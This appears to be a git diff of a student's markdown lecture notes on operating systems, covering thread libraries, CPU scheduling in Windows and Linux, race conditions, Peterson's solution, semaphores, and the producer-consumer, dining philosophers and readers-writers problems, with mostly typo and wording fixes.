>User application sees user threads and creates/schedules these (an unrestricted number) > User application sees user threads and creates/schedules these (an unrestricted number)
![Image](assets/f.png)
Thread libraries provide an API for managing threads Thread libraries provide an API for managing threads
Thread libraries can be implemented Thread libraries can be implemented
>Entirely in user space (user threads) > Entirely in user space (user threads)
> >
>Based off system calls (rely on the kernel) > Based on system calls (rely on the kernel)
Examples of thread APIs include **POSIX PThreads**, windows threads and Java threads Examples of thread APIs include **POSIX PThreads**, Windows threads and Java threads.
`pthread_create` - Create new thread - `pthread_create` - Create new thread
`pthread_exit` - Exit existing thread - `pthread_exit` - Exit existing thread
`pthread_join` - Wait for thread with ID - `pthread_join` - Wait for thread with ID
`pthread_yield` - Release CPU - `pthread_yield` - Release CPU
`pthread_attr_init` - Thread Attributes (e.g. priority) - `pthread_attr_init` - Thread Attributes (e.g. priority)
`pthread_attr_destroy` - Release Attributes - `pthread_attr_destroy` - Release Attributes
`$ ~ man pthread_create` returns the help page `$ ~ man pthread_create` returns the help page
+19 -35
View File
@@ -1,18 +1,15 @@
09/10/20 09/10/20
**Multi-level scheduling algorithms** **Multi-level scheduling algorithms**
>Nothing is stopping us from using different scheduling algorithms for individual queues for each different priority level. > Nothing is stopping us from using different scheduling algorithms for individual queues for each different priority level.
> >
> - **Feedback queues** allow priorities to change dynamically i.e. jobs can move between queues > - **Feedback queues** allow priorities to change dynamically i.e. jobs can move between queues
1. Move to **lower priority queue** if too much CPU time is used > 1. Move to a **lower-priority queue** if too much CPU time is used
2. Move to **higher priority queue** to prevent starvation and avoid inversion of control. > 2. Move to a **higher-priority queue** to prevent starvation and avoid inversion of control.
Exam 2013: Explain how you would prevent starvation in a priority queue algorithm? Exam 2013: Explain how you would prevent starvation in a priority queue algorithm?
![alt text](assets/h.png) The solution to this is to momentarily boost thread A's priority level. This will let A do what it wants to do and release resource X so that B and C can run.
The solution to this is to momentarily boost thread A's priority level, this will let A do what it what's to do and release resource X so that B and C can run.
Priority boosting helps avoid control inversion. Priority boosting helps avoid control inversion.
@@ -31,21 +28,15 @@ Feedback queues are highly configurable and offer significant flexibility.
> >
> Two priority classes with 16 different priority levels exist. > Two priority classes with 16 different priority levels exist.
> >
> 1. **Real time** processes/threads have a fixed priority level. (These are the most important) > 1. **Real time** processes/threads have a fixed priority level. (These are the most important)
> 2. **Variable** processes/threads can have their priorities **boosted temporarily**. > 2. **Variable** processes/threads can have their priorities **boosted temporarily**.
> >
> A **round robin** is used within the queues. > A **round robin** is used within the queues.
![alt text](assets/I.png) ![alt text](assets/I.png)
![alt text](assets/j.png)
If you give a couple of the threads the highest priority level, you can freeze your computer. (causes starvation for low priority threads) If you give a couple of the threads the highest priority level, you can freeze your computer. (causes starvation for low priority threads)
<ins>**Scheduling in Linux**</ins> <ins>**Scheduling in Linux**</ins>
> Process scheduling has evolved over different versions of Linux to account for multiple processors/cores, processor affinity, and **load balancing** between cores. > Process scheduling has evolved over different versions of Linux to account for multiple processors/cores, processor affinity, and **load balancing** between cores.
@@ -53,15 +44,15 @@ If you give a couple of the threads the highest priority level, you can freeze y
> Linux distinguishes between two types of tasks for scheduling: > Linux distinguishes between two types of tasks for scheduling:
> >
> 1. **Real time tasks** (to be POSIX compliant) > 1. **Real time tasks** (to be POSIX compliant)
> 1. Real time FIFO tasks > 1. Real time FIFO tasks
> 2. Real time Round Robin tasks > 2. Real time Round Robin tasks
> 2. **Time sharing tasks** using a pre-emptive approach (similar to variable in Windows) > 2. **Time sharing tasks** using a pre-emptive approach (similar to variable in Windows)
> >
> The most recent scheduling algorithm in Linux for time sharing tasks is the **completely fair scheduler** > The most recent scheduling algorithm in Linux for time sharing tasks is the **completely fair scheduler**
**Real time FIFO** have the highest priority and are scheduled with a **FCFS approach** using a pre-emption if a higher priority job shows up. **Real-time FIFO tasks** have the highest priority and are scheduled with an **FCFS approach**, using pre-emption if a higher-priority job shows up.
**Real time round robin tasks** are preemptable by clock interrupts and have a time slice associated with them. **Real-time round robin tasks** can be pre-empted by clock interrupts and have a time slice associated with them.
Both ways *cannot* guarantee hard deadlines. Both ways *cannot* guarantee hard deadlines.
@@ -71,25 +62,21 @@ Both ways *cannot* guarantee hard deadlines.
> >
> <ins>If all N processes/threads have the same priority. </ins> > <ins>If all N processes/threads have the same priority. </ins>
> >
> ​ They will be allocated a time slice equal to 1/N times the available CPU time. > They will be allocated a time slice equal to 1/N times the available CPU time.
> >
> The length of the **time slice** and the available CPU time are based on the **targeted latency** (every process/thread should run at least once in this time) > The length of the **time slice** and the available CPU time are based on the **targeted latency** (every process/thread should run at least once in this time)
> >
> If N is very large, the **context switch time will be dominant**, hence a lower bound on the time slice is imposed by the minimum granularity. > If N is very large, the **context switch time will be dominant**, hence a lower bound on the time slice is imposed by the minimum granularity.
> >
> ​ A process/thread's time slice can be no less than the **minimum granularity.** > A process/thread's time slice can be no less than the **minimum granularity.**
A **weighting scheme** is used to take difference priorities into account. A **weighting scheme** is used to take different priorities into account.
<img src="assets/k.png" alt="alt text" style="zoom:60%;" />
The tasks with the **lowest proportional amount** of "used CPU time" are selected first. (Shorter tasks picked first if Wi is the same). The tasks with the **lowest proportional amount** of "used CPU time" are selected first. (Shorter tasks picked first if Wi is the same).
**Shared Queues** **Shared Queues**
A single of multi-level queue **shared** between all CPUs A single or multi-level queue **shared** between all CPUs
| Pros | Cons | | Pros | Cons |
| ---------------------------- | -------------------------------------------------------- | | ---------------------------- | -------------------------------------------------------- |
@@ -98,8 +85,6 @@ A single of multi-level queue **shared** between all CPUs
Windows will allocate the **highest priority threads** to the individual CPUs/cores. Windows will allocate the **highest priority threads** to the individual CPUs/cores.
**Private Queues** **Private Queues**
> Each CPU has a private (set) of queues > Each CPU has a private (set) of queues
@@ -111,15 +96,15 @@ Windows will allocate the **highest priority threads** to the individual CPUs/co
**Related vs. Unrelated threads** **Related vs. Unrelated threads**
> **Related**: multiple threads that communicated with one another and **ideally run** together > **Related**: multiple threads that communicate with one another and **ideally run** together
> >
> **Unrelated** processes threads that are **independent**, possibly started by **different users** running different programs. > **Unrelated**: processes or threads that are **independent**, possibly started by **different users** running different programs.
![alt text](assets/L.png) ![alt text](assets/L.png)
Threads belong to the same process are cooperating e.g. they **exchange messages** or **share information** Threads belonging to the same process are cooperating, e.g. they **exchange messages** or **share information**.
The aim is to get threads running as much as possible, at the **same time across multiple CPU**s. The aim is to get threads running as much as possible at the **same time across multiple CPUs**.
**Space Sharing** **Space Sharing**
@@ -137,5 +122,4 @@ The aim is to get threads running as much as possible, at the **same time across
> >
> A pre-emptive algorithm > A pre-emptive algorithm
> >
> **Blocking threads** result in idle CPU (If a thread blocks, the rest of the time slice will be unused due the time slice synchronisation across all CPUs) > **Blocking threads** result in an idle CPU (if a thread blocks, the rest of the time slice will be unused due to the time slice synchronisation across all CPUs)
+11 -21
View File
@@ -29,11 +29,9 @@ int main() {
} }
``` ```
This piece of code creates two threads, and points them towards the `calc` function. The `pthread_join(tid1,NULL);` line is waiting until thread 1 is finished until the code moves on. This piece of code creates two threads and points them towards the `calc` function. The `pthread_join(tid1,NULL);` line waits until thread 1 has finished before the code moves on.
`counter++` consists of three separate actions.
Counter++ consists of three separate actions.
1. *read* the value of counter from memory and **store it in a register** 1. *read* the value of counter from memory and **store it in a register**
2. *add* one to the value in the register 2. *add* one to the value in the register
@@ -41,17 +39,11 @@ Counter++ consists of three separate actions.
The above actions are **not** "atomic". This means they can be interrupted by the timer. The above actions are **not** "atomic". This means they can be interrupted by the timer.
![image](assets/p.png)
TCB - *Thread Control Block* TCB - *Thread Control Block*
This is what could happen if the threads are not interrupted.
However the thread control block could be out of date by the time the thread starts running again. For example *counter* could be 2 but the thread control block still has the old value of *counter*. However the thread control block could be out of date by the time the thread starts running again. For example *counter* could be 2 but the thread control block still has the old value of *counter*.
The problem is that simple instructions in C are actually multiple instructions in assembly code. Another example is `print()`.
The problem is that simple instructions in c are actually multiple instructions in assembly code. Another example is `print()`
```c ```c
void print() { void print() {
@@ -71,7 +63,7 @@ However, if **interleaved** like this they do interact. The global variable used
> Consider a **bounded buffer** in which N items can be stored > Consider a **bounded buffer** in which N items can be stored
> >
> A **counter** is maintained to count the number of items currently in the buffer. **Increment** when something is added and **decremented** when an item is removed. > A **counter** is maintained to count the number of items currently in the buffer. It is **incremented** when something is added and **decremented** when an item is removed.
> >
> Similar **concurrency problems** as with the calculation of sums happen in the bounded buffer which is a consumer problem. > Similar **concurrency problems** as with the calculation of sums happen in the bounded buffer which is a consumer problem.
@@ -96,11 +88,11 @@ while (true) {
} }
``` ```
This is a circular queue, there's a start and end pointer (*in* and *out*). The shared counter is being manipulated from 2 different places which can go wrong. This is a circular queue: there's a start and end pointer (*in* and *out*). The shared counter is being manipulated from two different places, which can go wrong.
## Race Conditions ## Race Conditions
A **race conditions occurs** when multiple threads/processes **access shared data** and the result is dependent on **the order in which the instructions are interleaved**. A **race condition occurs** when multiple threads/processes **access shared data** and the result is dependent on **the order in which the instructions are interleaved**.
### Concurrency within the OS ### Concurrency within the OS
@@ -137,10 +129,10 @@ A **critical section** is a set of instructions in which **shared resources** be
Any solution to the **critical section problem** must satisfy the following requirements: Any solution to the **critical section problem** must satisfy the following requirements:
1. **Mutual exclusion** - only one process can be in its critical section at any one point in time. 1. **Mutual exclusion** - only one process can be in its critical section at any one point in time.
2. **Progress** - any process must be able to enter its critical section at some point in time. (a process/thread has a right to enter its critical section at a point in time). If there is no thread/process in the critical section there is no reason for the currently thread not to be allowed in the **critical section**. 2. **Progress** - any process must be able to enter its critical section at some point in time. (A process/thread has a right to enter its critical section at a point in time.) If there is no thread/process in the critical section, there is no reason for the current thread not to be allowed in the **critical section**.
3. **Fairness/bounded waiting** - fairly distributed waiting times/processes cannot be made to wait indefinitely. 3. **Fairness/bounded waiting** - fairly distributed waiting times/processes cannot be made to wait indefinitely.
These requirements have to be satisfied, independent of the order in which sequences are executed. These requirements have to be satisfied independently of the order in which sequences are executed.
### Enforcing Mutual Exclusion ### Enforcing Mutual Exclusion
@@ -157,16 +149,14 @@ A set of processes/threads is *deadlocked* if each process/thread in the set is
Each **deadlocked process/thread** is waiting for a resource held by another deadlocked process/thread (which cannot run and hence release the resource). Each **deadlocked process/thread** is waiting for a resource held by another deadlocked process/thread (which cannot run and hence release the resource).
* Assume that X and Y are **mutually exclusive resources**. - Assume that X and Y are **mutually exclusive resources**.
* Thread A and B need to **acquire both resources** and request them in oppose orders. - Threads A and B need to **acquire both resources** and request them in opposite orders.
![img](assets/r.png)
**Four conditions** must hold for a deadlock to occur **Four conditions** must hold for a deadlock to occur
1. **Mutual exclusion** - a resource can be assigned to at most one process at a time. 1. **Mutual exclusion** - a resource can be assigned to at most one process at a time.
2. **Hold and wait condition** - a resource can be held while requesting new resources. 2. **Hold and wait condition** - a resource can be held while requesting new resources.
3. **No pre-emption** - resources cannot be forcefully taken away from a process 3. **No pre-emption** - resources cannot be forcefully taken away from a process
4. **Circular wait** - there is a circular chain of two or more processes,, waiting for a resource held by the other processes. 4. **Circular wait** - there is a circular chain of two or more processes waiting for a resource held by the other processes.
**No deadlocks** can occur if one of the conditions isn't met. **No deadlocks** can occur if one of the conditions isn't met.
+24 -30
View File
@@ -2,15 +2,15 @@
## Peterson's Solution ## Peterson's Solution
**Peterson's solution** is a **software based** solution which worked well on **older machines** **Peterson's solution** is a **software-based** solution which worked well on **older machines**
Two **shared variables** are used Two **shared variables** are used
1. *turn* - indicates which process is next to enter its critical section. 1. *turn* - indicates which process is next to enter its critical section.
2. *Boolean flag [2]* - indicates that a process is ready to enter its critical section 2. *Boolean flag [2]* - indicates that a process is ready to enter its critical section
* Peterson's solution can be used over multiple processes or threads - Peterson's solution can be used over multiple processes or threads
* Peterson's solution for two processes satisfies all **critical section requirements** (mutual exclusion, progress, fairness) - Peterson's solution for two processes satisfies all **critical section requirements** (mutual exclusion, progress, fairness)
`````c `````c
do { do {
@@ -44,15 +44,15 @@ do {
**Figure**: *Peterson's solution for process j* **Figure**: *Peterson's solution for process j*
Even when these two processes are interleaved, its unbreakable as there is always a check to see if the other process is in the critical section. Even when these two processes are interleaved, it's unbreakable as there is always a check to see if the other process is in the critical section.
### Mutual exclusion requirement: ### Mutual exclusion requirement:
The variable turn can have at most one value at a time. The variable turn can have at most one value at a time.
* Both `flag[i]` and `flag[j]` are *true* when they want to enter their critical section - Both `flag[i]` and `flag[j]` are *true* when they want to enter their critical section
* Turn is a **singular variable** that can store only one value - Turn is a **singular variable** that can store only one value
* Hence `while (flag[i] && turn == i);` or `while (flag[j] && turn == j);` is true and at most one process can enter its critical section (mutual exclusion) - Hence `while (flag[i] && turn == i);` or `while (flag[j] && turn == j);` is true and at most one process can enter its critical section (mutual exclusion)
**Progress**: any process must be able to enter its critical section at some point in time **Progress**: any process must be able to enter its critical section at some point in time
@@ -60,26 +60,25 @@ The variable turn can have at most one value at a time.
> >
> If a process *j* does not want to enter its critical section > If a process *j* does not want to enter its critical section
> >
> * `flag[j] == false` > - `flag[j] == false`
> * `white (flag[j] && turn == j)` will terminate for process *i* > - `white (flag[j] && turn == j)` will terminate for process *i*
> * *i* enters critical section > - *i* enters critical section
### Fairness/bounded waiting ### Fairness/bounded waiting
Fairly distributed waiting times/process cannot be made to wait indefinitely. Fairly distributed waiting times: processes cannot be made to wait indefinitely.
> If P<sub>i</sub> and P<sub>j</sub> both want to enter their critical section > If P<sub>i</sub> and P<sub>j</sub> both want to enter their critical section
> >
> * `flag[i] == flag[j] == true` > - `flag[i] == flag[j] == true`
> * `turn` is either *i* or *j* assuming that `turn == i` *i* enters it's critical section > - `turn` is either *i* or *j*. Assuming that `turn == i`, *i* enters its critical section
> * *i* finishes critical section `flag[i] = false` and then *j* enters its critical section. > - *i* finishes critical section `flag[i] = false` and then *j* enters its critical section.
Peterson's solution works when there is two or more processes. Questions on Peterson's solution with more than two solutions is not in the spec.
Peterson's solution works when there are two or more processes. Questions on Peterson's solution with more than two processes are not in the specification.
**Disable interrupts** whilst **executing a critical section** and prevent interruptions from I/O devices etc. **Disable interrupts** whilst **executing a critical section** and prevent interruptions from I/O devices etc.
For example we see `counter ++` as one instruction however it is three instructions in assembly code. If there is an interrupt somewhere in the middle of these three instructions bad things happen. For example, we see `counter ++` as one instruction, but it is three instructions in assembly code. If there is an interrupt somewhere in the middle of these three instructions, bad things happen.
```c ```c
register = counter; register = counter;
@@ -93,10 +92,10 @@ Disabling interrupts may be appropriate on a **single CPU machine**, not on a mu
> Implement `test_and_set()` and `swap_and_compare()` instructions as a **set of atomic (uninterruptible) instructions** > Implement `test_and_set()` and `swap_and_compare()` instructions as a **set of atomic (uninterruptible) instructions**
> >
> * Reading and setting the variables is done as **one complete set of instructions** > - Reading and setting the variables is done as **one complete set of instructions**
> * If `test_and_set()` / `sawp_and_compare()` are called **simultaneously** they will be executed sequentially. > - If `test_and_set()` / `sawp_and_compare()` are called **simultaneously** they will be executed sequentially.
> >
> They are used in combination with **global lock variables**, assumed to be `true (1) ` is the lock is in use. > They are used in combination with **global lock variables**, assumed to be `true (1)` if the lock is in use.
#### Test_and_set() #### Test_and_set()
@@ -121,8 +120,8 @@ do {
} while (...) } while (...)
``` ```
* `test_and_set()` must be **atomic**. - `test_and_set()` must be **atomic**.
* If two processes are using `test_and_set()` and are interleaved, it can lead to two processes going into the critical section. - If two processes are using `test_and_set()` and are interleaved, it can lead to two processes going into the critical section.
```c ```c
// Compare and swap method // Compare and swap method
@@ -146,16 +145,11 @@ do {
} while (...); } while (...);
``` ```
`test_and_set()` and `swap_and_compare()` are **hardware instructions** and **not directly accessible** to the user. `test_and_set()` and `swap_and_compare()` are **hardware instructions** and **not directly accessible** to the user.
**Disadvantages**: **Disadvantages**:
* **Busy waiting** is used. When the process is doing **nothing** just sitting in a loop, the process is still eating up processor time. If I know the process won't be **waiting for long busy waiting is beneficial** however if it is a long time a blocking signal will be sent to the process. - **Busy waiting** is used. When the process is doing **nothing**, just sitting in a loop, it is still eating up processor time. If I know the process won't be **waiting for long, busy waiting is beneficial**. However, if it is a long time, a blocking signal will be sent to the process.
* **Deadlock** is possible e.g when two locks are requested in opposite orders in different threads. - **Deadlock** is possible e.g when two locks are requested in opposite orders in different threads.
The OS uses the hardware instructions to implement higher level mechanisms/instructions for mutual exclusion i.e. **mutexes** and **semaphores**.
The OS uses the hardware instructions to implement higher-level mechanisms/instructions for mutual exclusion, i.e. **mutexes** and **semaphores**.
+33 -41
View File
@@ -24,10 +24,10 @@ release() {
} }
``` ```
`acquire()` and `release()` must be **atomic instructions** . `acquire()` and `release()` must be **atomic instructions**.
* No **interrupts** should occur between reading and setting the lock. - No **interrupts** should occur between reading and setting the lock.
* If interrupts can occur, the follow sequence could occur. - If interrupts can occur, the following sequence could occur.
```c ```c
T_i => lock available T_i => lock available
@@ -41,20 +41,18 @@ The process/thread that acquires the lock must **release the lock** - in contras
| Pros | Cons | | Pros | Cons |
| ------------------------------------------------------------ | ------------------------------------------------------------ | | ------------------------------------------------------------ | ------------------------------------------------------------ |
| Context switches can be **avoided**. | Calls to `acquire()` result in **busy waiting**. Shocking performance on single CPU systems. | | Context switches can be **avoided**. | Calls to `acquire()` result in **busy waiting**. Shocking performance on single CPU systems. |
| Efficient on multi-core systems when locks are **held for a short time**. | A thread can waste it's entire time slice busy waiting. | | Efficient on multi-core systems when locks are **held for a short time**. | A thread can waste its entire time slice busy waiting. |
![img](assets/S.png) ![img](assets/S.png)
## Semaphores ## Semaphores
> **Semaphores** are an approach for **mutual exclusion** and **process synchronisation** provided by the operating system. > **Semaphores** are an approach for **mutual exclusion** and **process synchronisation** provided by the operating system.
> >
> * They contain an **integer variable** > - They contain an **integer variable**
> * We distinguish between **binary** (0-1) and **counting semaphores** (0-N) > - We distinguish between **binary** (0-1) and **counting semaphores** (0-N)
> >
> Two **atomic functions** are used to manipulate semaphores** > Two **atomic functions** are used to manipulate semaphores.
> >
> 1. `wait()` - called when a resource is **acquired** the counter is decremented. > 1. `wait()` - called when a resource is **acquired** the counter is decremented.
> 2. `signal()` / `post()` is called when the resource is **released**. > 2. `signal()` / `post()` is called when the resource is **released**.
@@ -108,12 +106,12 @@ Calling `wait()` will **block** the process when the internal **counter is negat
Calling `post()` **removes a process/thread** from the blocked queue if the counter is less than or equal to 0. Calling `post()` **removes a process/thread** from the blocked queue if the counter is less than or equal to 0.
1. The process/thread state is changed from ***blocked** to **ready** 1. The process/thread state is changed from **blocked** to **ready**
2. Different queuing strategies can be employed to **remove** process/threads e.g. FIFO etc 2. Different queuing strategies can be employed to **remove** processes/threads, e.g. FIFO
The negative value of the semaphore is the **number of processes waiting** for the resource. The negative value of the semaphore is the **number of processes waiting** for the resource.
`block()` and `wait()` are system called provided by the OS. `block()` and `wait()` are system calls provided by the OS.
`post()` and `wait()` **must** be **atomic** `post()` and `wait()` **must** be **atomic**
@@ -139,17 +137,15 @@ Semaphores put your code to sleep. Mutexes apply busy waiting to user code.
Semaphores within the **same process** can be declared as **global variables** of the type `sem_t` Semaphores within the **same process** can be declared as **global variables** of the type `sem_t`
> * `sem_init()` - initialises the value of the semaphore. > - `sem_init()` - initialises the value of the semaphore.
> * `sem_wait()` - decrements the value of the semaphore. > - `sem_wait()` - decrements the value of the semaphore.
> * `sem_post()` - increments the values of the semaphore. > - `sem_post()` - increments the values of the semaphore.
![img](assets/t.png)
Synchronising code does result in a **performance penalty** Synchronising code does result in a **performance penalty**
> * Synchronise only **when necessary** > - Synchronise only **when necessary**
> >
> * Synchronise as **few instructions** as possible (synchronising unnecessary instructions will delay others from entering their critical section) > - Synchronise as **few instructions** as possible (synchronising unnecessary instructions will delay others from entering their critical section)
```c ```c
void * calc(void * increments) { void * calc(void * increments) {
@@ -167,36 +163,34 @@ void * calc(void * increments) {
#### Starvation #### Starvation
> Poorly designed **queueing approaches** (e.g. LIFO) may results in fairness violations > Poorly designed **queuing approaches** (e.g. LIFO) may result in fairness violations
#### Deadlock #### Deadlock
> Two or more processes are **waiting indefinitely** for an event that can be caused only by one of the waiting processes or thread. > Two or more processes are **waiting indefinitely** for an event that can be caused only by one of the waiting processes or threads.
#### Priority Inversion #### Priority Inversion
> Priority inversion happens when a high priority process (`H`) has to wait for a **resource** currently held by a low priority process (`L`) > Priority inversion happens when a high-priority process (`H`) has to wait for a **resource** currently held by a low-priority process (`L`)
> >
> Priority inversion can happen in chains e.g. `H` waits for `L` to release a resource and L is interrupted by a medium priority process `M`. > Priority inversion can happen in chains e.g. `H` waits for `L` to release a resource and L is interrupted by a medium priority process `M`.
> >
> This can be avoided by implementing priority inheritance to boost `L` to the `H`'s priority. > This can be avoided by implementing priority inheritance to boost `L` to `H`'s priority.
## The Producer and Consumer Problem ## The Producer and Consumer Problem
> * Producer(s) and consumer(s) share N **buffers** (an array) that are capable of holding **one item each** like a printer queue. > - Producer(s) and consumer(s) share N **buffers** (an array) that are capable of holding **one item each** like a printer queue.
> * The buffer can be of bounded (size N) or **unbounded size**. > - The buffer can be of bounded (size N) or **unbounded size**.
> * There can be one or multiple consumers and or producers. > - There can be one or multiple consumers and/or producers.
> * The **producer(s)** add items and **goes to sleep** if the buffer is **full** (only for a bounded buffer) > - The **producer(s)** add items and **go to sleep** if the buffer is **full** (only for a bounded buffer)
> * The **consumer(s)** remove items and **goes to sleep** if the buffer is **empty** > - The **consumer(s)** remove items and **go to sleep** if the buffer is **empty**
The simplest version of this problem has **one producer**, **one consumer** and a buffer of **unbounded size**. The simplest version of this problem has **one producer**, **one consumer** and a buffer of **unbounded size**.
* A counter (index) variable keeps track of the **number of items in the buffer**. - A counter (index) variable keeps track of the **number of items in the buffer**.
* It uses **two binary semaphores:** - It uses **two binary semaphores:**
* `sync` **synchronises** access to the **buffer** (counter) which is initialised to 1. - `sync` **synchronises** access to the **buffer** (counter) which is initialised to 1.
* `delay_consumer` ensures that the **consumer** goes to **sleep** when there are no items available, initialised to 0. - `delay_consumer` ensures that the **consumer** goes to **sleep** when there are no items available, initialised to 0.
![img](assets/U.png) ![img](assets/U.png)
@@ -206,16 +200,14 @@ It is obvious that any manipulations of count will have to be **synchronised**.
> When the consumer has **exhausted the buffer** (when `items == 0`), it should go to sleep but the producer increments `items` before the consumer checks it. > When the consumer has **exhausted the buffer** (when `items == 0`), it should go to sleep but the producer increments `items` before the consumer checks it.
> >
> * Consumer has removed the **last element** > - Consumer has removed the **last element**
> * The producer adds a **new element** > - The producer adds a **new element**
> * The consumer should have gone to sleep but no longer will > - The consumer should have gone to sleep but no longer will
> * The consumer consumes **non-existing elements** > - The consumer consumes **non-existing elements**
> >
> **Solutions**: > **Solutions**:
> >
> * Move the consumers' if statement inside the critical section > - Move the consumer's if statement inside the critical section
### Producers and Consumers Problem ### Producers and Consumers Problem
+15 -20
View File
@@ -2,14 +2,12 @@
## The Dining Philosophers Problem ## The Dining Philosophers Problem
<img src="assets/w.png" alt="img" style="zoom:67%;" />
The problem is defined as: The problem is defined as:
* **Five philosophers** are sitting on a round table - **Five philosophers** are sitting around a round table
* Each one has a plate of spaghetti - Each one has a plate of spaghetti
* The spaghetti is too slippery, and each philosopher **needs 2 forks** to be able to eat - The spaghetti is too slippery, and each philosopher **needs 2 forks** to be able to eat
* When hungry, the philosopher tries to acquire the forks on his left and right. - When hungry, the philosopher tries to acquire the forks on his left and right.
Note that this reflects the general problem of **sharing a limited set** of resources (forks) between a **number of processes** (philosophers). Note that this reflects the general problem of **sharing a limited set** of resources (forks) between a **number of processes** (philosophers).
@@ -17,15 +15,15 @@ Note that this reflects the general problem of **sharing a limited set** of reso
**Forks** are represented by **semaphores** (initialised to 1) **Forks** are represented by **semaphores** (initialised to 1)
* 1 if the fork is available: the philosopher can continue. - 1 if the fork is available: the philosopher can continue.
* 0 if the fork is unavailable: the philosopher goes to **sleep** if trying to acquire it. - 0 if the fork is unavailable: the philosopher goes to **sleep** if trying to acquire it.
Solution: Every philosopher picks up one fork and waits for the second fork to become available (without putting the first one down). Solution: Every philosopher picks up one fork and waits for the second fork to become available (without putting the first one down).
This solution will **deadlock** every time. This solution will **deadlock** every time.
> * The deadlock can be avoided by exponential decay. This is where a philosopher puts down their fork and waits for a random amount of time. (this is how Ethernet systems avoid data collisions) > - The deadlock can be avoided by exponential decay. This is where a philosopher puts down their fork and waits for a random amount of time. (This is how Ethernet systems avoid data collisions.)
> * Just **add another fork** > - Just **add another fork**
### Solution 2 ### Solution 2
@@ -33,9 +31,7 @@ This solution will **deadlock** every time.
*Question*: Can I initialise the value of the `eating` semaphore to 2 to create more parallelism? *Question*: Can I initialise the value of the `eating` semaphore to 2 to create more parallelism?
Setting the semaphore to 2 allows the possibility of 2 philosophers to eat at one time. If these two philosophers are sitting next to each other then they will try to grab the same fork. The code will not deadlock, however only one (sometimes two) philosopher(s) is able to eat. Setting the semaphore to 2 allows the possibility of two philosophers eating at one time. If these two philosophers are sitting next to each other, they will try to grab the same fork. The code will not deadlock, but only one (sometimes two) philosopher(s) can eat.
### Solution 3 ### Solution 3
@@ -43,12 +39,12 @@ A more sophisticated solution is necessary to allow **maximum parallelism**
The solution uses: The solution uses:
> * `state[N]` : one **state variable** for every philosopher (`THINKING` `HUNGRY` and `EATING`) > - `state[N]` : one **state variable** for every philosopher (`THINKING` `HUNGRY` and `EATING`)
> * `phil[N] ` : one **semaphore per philosopher** (i.e. **not forks** initialised to 0) > - `phil[N] ` : one **semaphore per philosopher** (i.e. **not forks** initialised to 0)
> * The philosopher goes to sleep if one of their neighbours are eating > - The philosopher goes to sleep if one of their neighbours is eating
> * The neighbours wake up the philosopher if they have finished eating > - The neighbours wake up the philosopher if they have finished eating
> * `sync` : one **semaphore/mutex** to enforce **mutual exclusion** of the critical section (while updating the **states** of `hungry` `thinking` and `eating`) > - `sync` : one **semaphore/mutex** to enforce **mutual exclusion** of the critical section (while updating the **states** of `hungry` `thinking` and `eating`)
> * A philosopher can only **start eating** if their neighbours are **not eating**. > - A philosopher can only **start eating** if their neighbours are **not eating**.
![img](assets/X.png) ![img](assets/X.png)
@@ -111,4 +107,3 @@ void test(int i) {
} }
} }
``` ```
+18 -53
View File
@@ -1,14 +1,14 @@
23/10/20 23/10/20
## The readers-writers Problem ## The Readers-Writers Problem
* Reading a record (or a variable) can happen in parallel without problems, **writing needs synchronisation** (or exclusive access). - Reading a record (or a variable) can happen in parallel without problems. **Writing needs synchronisation** (or exclusive access).
* Different solutions exist: - Different solutions exist:
> * Solution 1: naive implementation with limited parallelism > - Solution 1: naive implementation with limited parallelism
> * Solution 2: **readers** receive **priority**. No reader is kept waiting unless a writer already has access (writers may starve). > - Solution 2: **readers** receive **priority**. No reader is kept waiting unless a writer already has access (writers may starve).
> * Solution 3: **writing** is performed as soon as possible (readers may starve). > - Solution 3: **writing** is performed as soon as possible (readers may starve).
### Solution 1: No parallelism ### Solution 1: No parallelism
@@ -41,9 +41,9 @@ A correct implementation requires:
> `iReadCount`: an integer tracking the number of readers > `iReadCount`: an integer tracking the number of readers
> >
> * if `iReadCount` > 0: writers are blocked `sem_wait(rwSync)` > - if `iReadCount` > 0: writers are blocked `sem_wait(rwSync)`
> * if `iReadCount` == 0: writers are released `sem_post(rwSync)` > - if `iReadCount` == 0: writers are released `sem_post(rwSync)`
> * if already writing, readers must wait > - if already writing, readers must wait
> >
> `sync`: a mutex for mutual exclusion of `iReadCount`. > `sync`: a mutex for mutual exclusion of `iReadCount`.
> >
@@ -55,9 +55,9 @@ A correct implementation requires:
When `iReadCount == 1`, the `sem_wait(&rwSync)` is used to block the writer from writing. Further down in the code when `iReadCount == 0`, the `sem_post(&rwSync)` is called to 'wake up' the writer, so that it can write. When `iReadCount == 1`, the `sem_wait(&rwSync)` is used to block the writer from writing. Further down in the code when `iReadCount == 0`, the `sem_post(&rwSync)` is called to 'wake up' the writer, so that it can write.
When we say 'send process to sleep' or 'wake up a process' we actually mean: move that process from the blocked queue to the ready queue (or visa versa). When we say 'send a process to sleep' or 'wake up a process', we actually mean: move that process from the blocked queue to the ready queue (or vice versa).
If the `iReadCount == 1` is run when the writer is writing. The `sem_wait(&rwSync)` will go from 0 -> -1, forcing the reader to go to sleep. As soon as the writer is done, the `sem_post(&rwSync)` is run meaning it goes from -1 -> 0, which wakes the reader up. If `iReadCount == 1` is run when the writer is writing, `sem_wait(&rwSync)` will go from 0 -> -1, forcing the reader to go to sleep. As soon as the writer is done, `sem_post(&rwSync)` is run, meaning it goes from -1 -> 0, which wakes the reader up.
Unless `iReadCount` reaches 0, writing will not happen. **This means writers can easily starve if there are multiple readers**. Unless `iReadCount` reaches 0, writing will not happen. **This means writers can easily starve if there are multiple readers**.
@@ -65,56 +65,21 @@ Unless `iReadCount` reaches 0, writing will not happen. **This means writers can
**Solution 3 uses:** **Solution 3 uses:**
> * `iReadCount` and `iWriteCount`: to keep track of the number of readers and writers. > - `iReadCount` and `iWriteCount`: to keep track of the number of readers and writers.
> * `sRead`/`sWrite`: to synchronise the **reader/writer's critical section**. > - `sRead`/`sWrite`: to synchronise the **reader/writer's critical section**.
> * `sReadTry`: to **stop readers** when there is a **writer waiting**. > - `sReadTry`: to **stop readers** when there is a **writer waiting**.
> * `sResource`: to **synchronise** the resource for **reading/writing**. > - `sResource`: to **synchronise** the resource for **reading/writing**.
![img](assets/Z.png) ![img](assets/Z.png)
[explanation time stamp 43:35] [Explanation timestamp 43:35]
`sRead` and `sWrite` are used whenever `iReadCount` and `iWriteCount` are used respectively. Unlike the mutex in the last example it is important that the same semaphore variable isn't used for both `iReadCount` and `iWriteCount`. `sRead` and `sWrite` are used whenever `iReadCount` and `iWriteCount` are used respectively. Unlike the mutex in the last example it is important that the same semaphore variable isn't used for both `iReadCount` and `iWriteCount`.
